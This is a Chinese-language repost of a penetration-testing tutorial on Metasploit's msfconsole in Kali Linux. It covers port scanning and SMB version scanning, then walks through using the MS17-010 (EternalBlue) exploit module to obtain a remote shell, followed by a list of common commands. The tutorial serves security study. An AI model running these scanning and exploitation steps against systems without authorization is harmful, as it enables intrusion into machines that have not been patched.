首先我们可以通过在终端里面输入sudo su密码默认kali直接回车 让kali从普通用户变成root超级管理员用户避免权限不足。
1.msfconsole介绍
msfconsole简称msf是一款常见的渗透测试工具,包含了常见的漏洞利用模块和生成各种木马,方便于安全人员的使用。
2.msfconsole使用
msfconsole:启动metasploit命令行
打开 msfconsole
第一步:进行端口扫描
1.查看端口扫描的模块
search portscan
2.使用端口扫描模块
use auxiliary/scanner/portscan/top
3.使用端口扫描模块(模块里面的yes都要填)
show options
4.设置目标ip
set rhosts
5.设置线程为100
set threads 100
6.执行
run或exploit
这样open就是开放的端口,如图135和139
7.退出到msf
back
第二步:进行服务的扫描
1.查看smb_version
search smb_version
2.使用服务模板
use auxiliary/scanner/smb/smb_version
3.查看模块信息
show options
4.设置目标ip进行扫描
set rhosts目标ip
5.设置线程为10
set threads 10
6.执行
run或exploit
可以看到服务器信息
7.退出
back
3、使用ms17_010(永恒之蓝)进行复现
以永恒之蓝为例子 可以先搜索微软给的编号ms17_010 在use其中的一项
配置模块必选项 show options
*require为yes就是必选项
host为kali地址 lport为端口 lport可以更改
set lport 0~65535
代码解读
最后输入run开始运行
成功得到shell
4.一些命令
show exploits – 查看所有可用的渗透攻击程序代码
show auxiliary – 查看所有可用的辅助攻击工具
[show ]options/advanced – 查看该模块可用选项
show payloads – 查看该模块适用的所有载荷代码
show targets – 查看该模块适用的攻击目标类型
search – 根据关键字搜索某模块
info – 显示某模块的详细信息
use – 使用某渗透攻击模块
back – 回退
set/unset – 设置/禁用模块中的某个参数
setg/unsetg – 设置/禁用适用于所有模块的全局参数。
来源:
https://blog.csdn.net/Cairo_A/article/details/143334754
声明:技术文章均收集于互联网,仅作为本人学习、记录使用。侵权删!!!
原文始发于微信公众号(玄武盾网络技术实验室):【Web安全】kali渗透工具MSF以及msfconsole命令详解
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论